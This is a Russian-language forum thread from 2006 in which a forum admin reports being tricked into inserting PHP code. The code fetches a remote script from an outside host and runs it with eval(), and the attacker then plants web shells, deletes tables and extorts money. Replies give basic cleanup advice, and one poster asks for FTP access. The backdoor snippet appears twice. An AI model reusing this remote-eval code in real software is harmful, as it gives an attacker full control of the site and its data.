zon Опубликовано 18 Ноября 2006 Жалоба Поделиться Опубликовано 18 Ноября 2006 Меня взломал хакер помагите, по своей неграмотности он попросил меня (16:52:38 18/11/2006)$this->ipsclass->skin['_wrapper'] = str_replace( "<% CHARSET %>" , $this->ipsclass->vars['gb_char_set'], $this->ipsclass->skin['_wrapper']); (16:52:47 18/11/2006)надо вставить (16:52:57 18/11/2006)$f = file('http://hades.runetu.ru/server.php');$ff = '';for ($i=0;$i<count($f);$i++) {$ff .= $f[$i]; }$this->ipsclass->skin['_wrapper'] = str_replace('<% ADVERS.RUNETU.RU %>',eval($ff),$this->ipsclass->skin['_wrapper']); После чего он получил доступ к чему то, сказал что шэллы заслал на форум и трёт мне таблицы, уже стёр ibf_admin_logs Грозится удалить всё, просит бабок.У меня есть 6 часов, ПОМОГИТЕ пожалуйста!!!!!!!!! Ссылка на комментарий Поделиться на других сайтах Прочее
0 Scream89 Опубликовано 18 Ноября 2006 Жалоба Поделиться Опубликовано 18 Ноября 2006 (изменено) Гыгы )) Смешно! Удали эту строку и проверь сервер на подозрительные файлы. Что тут ещё можно сказать? Глупый админ! UPD: Просто интересно стало, сколько он бабок требует? Изменено 18 Ноября 2006 пользователем Scream89 Ссылка на комментарий Поделиться на других сайтах Прочее
0 zon Опубликовано 18 Ноября 2006 Автор Жалоба Поделиться Опубликовано 18 Ноября 2006 Да давным уже всё удалил, но он после этого потёр таблицу снова!! Что делать очень прошу помочь, готов даже заплатить немного. Ссылка на комментарий Поделиться на других сайтах Прочее
0 Scream89 Опубликовано 18 Ноября 2006 Жалоба Поделиться Опубликовано 18 Ноября 2006 Да давным уже всё удалил, но он после этого потёр таблицу снова!! Что делать очень прошу помочь, готов даже заплатить немного.Удали эту строку и проверь сервер на подозрительные файлы. Ссылка на комментарий Поделиться на других сайтах Прочее
0 zon Опубликовано 18 Ноября 2006 Автор Жалоба Поделиться Опубликовано 18 Ноября 2006 Да удалил я эту строку!!! Но он после этого еще всё может делать!! Как проверить на файлы? Ссылка на комментарий Поделиться на других сайтах Прочее
0 Scream89 Опубликовано 18 Ноября 2006 Жалоба Поделиться Опубликовано 18 Ноября 2006 Да удалил я эту строку!!! Но он после этого еще всё может делать!! Как проверить на файлы?Какая версия форума? Если 2.1.7 то а АЦ есть утилита "Антивирус". Давай мне доступ по ФТП, я сам найду. В ЛС пиши... Ссылка на комментарий Поделиться на других сайтах Прочее
0 zon Опубликовано 18 Ноября 2006 Автор Жалоба Поделиться Опубликовано 18 Ноября 2006 2.15 или 2.1.6 не помню. Ну мне уже страшно что либо кому то давать.... Ссылка на комментарий Поделиться на других сайтах Прочее
0 Scream89 Опубликовано 18 Ноября 2006 Жалоба Поделиться Опубликовано 18 Ноября 2006 2.15 или 2.1.6 не помню. Ну мне уже страшно что либо кому то давать....И что ты предлагаешь? Ссылка на комментарий Поделиться на других сайтах Прочее
0 zon Опубликовано 18 Ноября 2006 Автор Жалоба Поделиться Опубликовано 18 Ноября 2006 А что ты можешь? : (19:18:00 18/11/2006)полное управление сайтом GC (19:18:23 18/11/2006)сайтом или тока форумом? (19:18:31 18/11/2006)всем доменом (19:19:10 18/11/2006)также есть одна наработка.. есть один контрольный шелл. и он проверяет каждые n секунд наличие остальных шеллов. если он не обнаруживает хотя бы один из них.. происходит мягко говоря "бабах" всего сайта сразу. так что крайне не советую что-то предупринимать. Ссылка на комментарий Поделиться на других сайтах Прочее
0 Scream89 Опубликовано 18 Ноября 2006 Жалоба Поделиться Опубликовано 18 Ноября 2006 А что ты можешь? : (19:18:00 18/11/2006)полное управление сайтом GC (19:18:23 18/11/2006)сайтом или тока форумом? (19:18:31 18/11/2006)всем доменом (19:19:10 18/11/2006)также есть одна наработка.. есть один контрольный шелл. и он проверяет каждые n секунд наличие остальных шеллов. если он не обнаруживает хотя бы один из них.. происходит мягко говоря "бабах" всего сайта сразу. так что крайне не советую что-то предупринимать.Самодовольный хакер? Давай ФТП, я посмотрю. Ссылка на комментарий Поделиться на других сайтах Прочее
0 zon Опубликовано 18 Ноября 2006 Автор Жалоба Поделиться Опубликовано 18 Ноября 2006 в личке Ссылка на комментарий Поделиться на других сайтах Прочее
0 Aliance spb Опубликовано 18 Ноября 2006 Жалоба Поделиться Опубликовано 18 Ноября 2006 Спасибо, поржал Вот баян-то. А бэкап БД сделать нельзя?После чего сменить все пароли, удалить все эти строчки и написать в суппорт хостеру. Ссылка на комментарий Поделиться на других сайтах Прочее
0 sudmed Опубликовано 18 Ноября 2006 Жалоба Поделиться Опубликовано 18 Ноября 2006 ZON, бэкапы тебе помогут, если своих нет - проси у хостера. ЗЫ Сколько денег хочет? Ну просто интересно.. Ссылка на комментарий Поделиться на других сайтах Прочее
0 zon Опубликовано 18 Ноября 2006 Автор Жалоба Поделиться Опубликовано 18 Ноября 2006 Все ОГРОМНОЕ спасибо Scream89хотел 1тыс уе Ссылка на комментарий Поделиться на других сайтах Прочее
0 SomehaiN Опубликовано 18 Ноября 2006 Жалоба Поделиться Опубликовано 18 Ноября 2006 Придут модераторы - предупреждение за "Осмысления названия тем" а тема прикольная - пожрал =)))) Ссылка на комментарий Поделиться на других сайтах Прочее
0 Камушкин Опубликовано 18 Ноября 2006 Жалоба Поделиться Опубликовано 18 Ноября 2006 а чего ржать? ну попал немного человек Ссылка на комментарий Поделиться на других сайтах Прочее
0 Mitos Опубликовано 18 Ноября 2006 Жалоба Поделиться Опубликовано 18 Ноября 2006 Общие Правила Форума Ссылка на комментарий Поделиться на других сайтах Прочее
Вопрос
zon
Меня взломал хакер помагите, по своей неграмотности он попросил меня
(16:52:38 18/11/2006)
$this->ipsclass->skin['_wrapper'] = str_replace( "<% CHARSET %>" , $this->ipsclass->vars['gb_char_set'], $this->ipsclass->skin['_wrapper']);
(16:52:47 18/11/2006)
надо вставить
(16:52:57 18/11/2006)
$f = file('http://hades.runetu.ru/server.php');
$ff = '';
for ($i=0;$i<count($f);$i++) {
$ff .= $f[$i]; }
$this->ipsclass->skin['_wrapper'] = str_replace('<% ADVERS.RUNETU.RU %>',eval($ff),$this->ipsclass->skin['_wrapper']);
После чего он получил доступ к чему то, сказал что шэллы заслал на форум и трёт мне таблицы, уже стёр ibf_admin_logs
Грозится удалить всё, просит бабок.
У меня есть 6 часов, ПОМОГИТЕ пожалуйста!!!!!!!!!
Ссылка на комментарий
Поделиться на других сайтах
16 ответов на этот вопрос
Рекомендуемые сообщения